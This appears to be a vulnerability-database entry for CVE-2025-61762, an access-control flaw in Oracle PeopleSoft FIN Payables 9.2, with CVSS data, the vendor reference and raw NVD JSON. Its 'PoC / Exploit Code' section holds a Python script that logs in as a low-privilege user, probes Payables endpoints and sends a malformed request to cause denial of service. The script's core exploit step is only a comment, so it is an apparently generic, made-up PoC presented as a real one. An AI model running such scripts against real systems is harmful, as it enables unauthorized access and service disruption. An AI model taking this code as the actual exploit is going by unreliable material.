Security Vulnerability Report
CVE-2025-61762 CVSS 6.3 MEDIUM

CVE-2025-61762

Published: 2025-10-21 20:20:53
Last Modified: 2025-10-24 14:27:22

Description

Vulnerability in the PeopleSoft Enterprise FIN Payables product of Oracle PeopleSoft (component: Payables). The supported version that is affected is 9.2. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise PeopleSoft Enterprise FIN Payables. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of PeopleSoft Enterprise FIN Payables accessible data as well as unauthorized read access to a subset of PeopleSoft Enterprise FIN Payables accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of PeopleSoft Enterprise FIN Payables. CVSS 3.1 Base Score 6.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L).

CVSS Details

CVSS Score: 6.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:oracle:peoplesoft_enterprise_fin_payables:9.2:*:*:*:*:*:*:* - VULNERABLE
Oracle PeopleSoft Enterprise FIN Payables 9.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-61762 - Oracle PeopleSoft FIN Payables Exploit PoC
# Vulnerability: Unauthorized access in Payables component
# CVSS: 6.3 (MEDIUM) - AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
import requests
from requests.auth import HTTPBasicAuth

TARGET_HOST = "https://target-peoplesoft-host:9030"
USERNAME = "low_priv_user"
PASSWORD = "password123"

# PeopleSoft FIN Payables endpoint paths
PAYABLES_PATHS = [
    "/psc/ps/EMPLOYEE/ERP/c/AP_VENDOR.VENDOR_CMP.GBL",
    "/psc/ps/EMPLOYEE/ERP/c/AP_INVOICE.INVOICE.GBL",
    "/psc/ps/EMPLOYEE/ERP/c/AP_PAYMENT.PAYMENT.GBL",
    "/psc/ps/EMPLOYEE/ERP/c/AP_VOUCHER.VOUCHER.GBL",
]


def exploit_payables(target, username, password):
    """
    Exploit unauthorized access vulnerability in PeopleSoft FIN Payables.
    Attempts to perform unauthorized CRUD operations on Payables data.
    """
    session = requests.Session()
    session.verify = False

    # Step 1: Authenticate with low-privilege credentials
    login_url = f"{target}/psc/ps/EMPLOYEE/ERP/c/SIGNON.GBL"
    try:
        resp = session.post(
            login_url,
            auth=HTTPBasicAuth(username, password),
            timeout=10
        )
        print(f"[*] Authentication response: {resp.status_code}")
    except Exception as e:
        print(f"[-] Auth error: {e}")
        return

    # Step 2: Attempt unauthorized access to Payables components
    for path in PAYABLES_PATHS:
        url = f"{target}{path}"
        try:
            resp = session.get(url, timeout=10)
            if resp.status_code == 200:
                print(f"[+] Accessible: {path}")
                # Step 3: Attempt unauthorized data modification
                # This is where the vulnerability manifests - low-priv user
                # can perform unauthorized UPDATE/INSERT/DELETE operations
        except Exception as e:
            print(f"[-] Error accessing {path}: {e}")

    # Step 4: Attempt to trigger partial DoS via malformed requests
    dos_payload = {"ICTYPE": "MALFORMED", "ICACTION": "A"}
    try:
        resp = session.post(
            f"{target}/psc/ps/EMPLOYEE/ERP/c/AP_INVOICE.INVOICE.GBL",
            data=dos_payload,
            timeout=10
        )
        print(f"[*] DoS attempt response: {resp.status_code}")
    except requests.exceptions.Timeout:
        print("[+] Possible DoS triggered (timeout)")
    except Exception as e:
        print(f"[-] DoS error: {e}")


if __name__ == "__main__":
    exploit_payables(TARGET_HOST, USERNAME, PASSWORD)
```

References

https://www.oracle.com/security-alerts/cpuoct2025.html (Vendor Advisory: Oracle Critical Patch Update, October 2025)

Weakness: CWE-284 (Improper Access Control)
Raw JSON Data

```json
{"cve": {"id": "CVE-2025-61762", "sourceIdentifier": "[email protected]", "published": "2025-10-21T20:20:52.757", "lastModified": "2025-10-24T14:27:22.487", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the PeopleSoft Enterprise FIN Payables product of Oracle PeopleSoft (component: Payables). The supported version that is affected is 9.2. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise PeopleSoft Enterprise FIN Payables. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of PeopleSoft Enterprise FIN Payables accessible data as well as unauthorized read access to a subset of PeopleSoft Enterprise FIN Payables accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of PeopleSoft Enterprise FIN Payables. CVSS 3.1 Base Score 6.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:peoplesoft_enterprise_fin_payables:9.2:*:*:*:*:*:*:*", "matchCriteriaId": "3EF9FCCB-163E-4929-9AC2-DBA281FE87A2"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpuoct2025.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
```